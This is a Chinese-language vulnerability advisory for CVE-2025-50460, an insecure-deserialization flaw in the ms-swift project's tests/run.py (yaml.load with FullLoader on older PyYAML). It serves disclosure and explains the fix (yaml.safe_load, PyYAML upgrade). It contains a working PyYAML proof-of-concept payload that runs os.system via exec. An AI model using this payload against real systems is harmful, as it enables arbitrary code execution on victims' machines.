状态:等待分析
该CVE记录已被标记用于NVD丰富工作。ms-swift项目版本3.3.0中存在一个远程代码执行(RCE)漏洞,原因是在tests/run.py中不安全地使用了PyYAML库(版本<=5.3.1)的yaml.load()进行反序列化。如果攻击者能够控制传递给--run_config参数的YAML配置文件的内容,则可以在反序列化过程中执行任意代码,从而导致系统完全受损。当加载恶意YAML文件时触发该漏洞,允许执行任意Python命令,如os.system()。建议将PyYAML升级到5.4或更高版本,并使用yaml.safe_load()来缓解该问题。
modelscope/ms-swift 项目存在一个远程代码执行(RCE)漏洞,原因是使用了不安全的 yaml.load() 以及易受攻击的 PyYAML 库版本(≤ 5.3.1)。该问题存在于 tests/run.py 脚本中,其中用户提供的 YAML 配置文件使用 yaml.load() 和 yaml.FullLoader 进行反序列化。
如果攻击者能够控制或替换提供给 --run_config 参数的 YAML 配置文件,他们可以注入恶意负载,从而导致任意代码执行。
tests/run.pyif args.run_config is not None and Path(args.run_config).exists():
with open(args.run_config, encoding='utf-8') as f:
run_config = yaml.load(f, Loader=yaml.FullLoader)
exploit.yaml)!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"
import yaml
with open("exploit.yaml", "r") as f:
cfg = yaml.load(f, Loader=yaml.FullLoader)
这将导致执行 os.system,证明代码执行。
yaml.load() 替换为 yaml.safe_load()# Before
yaml.load(f, Loader=yaml.FullLoader)
# After
yaml.safe_load(f)
| 字段 | 值 |
|---|
| CVE ID | CVE-2025-50460 |
| CVSS评分 | TBD |
| CWE | CWE-502:不可信数据的反序列化 |
| 报告日期 | 2025-04-25 |
| 披露日期 | 2025-07-30 |
| 受影响版本 | 最新 |
| 修复版本 |